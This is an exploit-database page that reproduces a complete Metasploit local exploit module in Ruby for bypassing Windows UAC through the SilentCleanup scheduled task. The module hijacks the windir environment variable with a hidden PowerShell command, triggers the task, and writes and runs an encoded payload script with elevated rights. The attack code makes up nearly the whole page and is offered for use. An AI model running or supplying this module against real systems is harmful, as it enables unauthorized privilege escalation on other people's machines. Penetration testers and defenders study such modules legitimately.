0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit
[##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Powershell
include Msf::Post::Windows::Priv
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',
'Description' => %q{
There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.
},
'License' => MSF_LICENSE,
'Author' => [
'tyranid', # Discovery
'enigma0x3', # Discovery
'nyshone69', # Discovery
'Carter Brainerd (cbrnrd)' # Metasploit Module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter', 'shell'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Microsoft Windows', {}]],
'DisclosureDate' => 'Feb 24 2019',
'References' => [
['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],
['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],
['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],
['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']
]
))
register_options(
[
OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),
OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"])
])
end
def get_bypass_script(cmd)
scr = %Q{
if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
#{cmd}
} else {
$registryPath = "HKCU:\\Environment"
$Name = "windir"
$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
Set-ItemProperty -Path $registryPath -Name $name -Value $Value
#Depending on the performance of the machine, some sleep time may be required before or after schtasks
Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}
schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null
Remove-ItemProperty -Path $registryPath -Name $name
}
}
vprint_status(scr)
scr
end
def exploit
check_permissions
e_vars = get_envs('TEMP')
payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"
# Write it to disk, run, delete
upload_payload_ps1(payload_fp)
vprint_good("Payload uploaded to #{payload_fp}")
cmd_exec("#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}")
end
def check_permissions
# Check if you are an admin
case is_in_admin_group?
when nil
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
when true
print_good('Part of Administrators group! Continuing...')
when false
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
def upload_payload_ps1(filepath)
pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
begin
vprint_status('Uploading payload PS1...')
write_file(filepath, get_bypass_script(pld))
register_file_for_cleanup(filepath)
rescue Rex::Post::Meterpreter::RequestError => e
fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")
end
end
end
# 0day.today [2024-11-15] #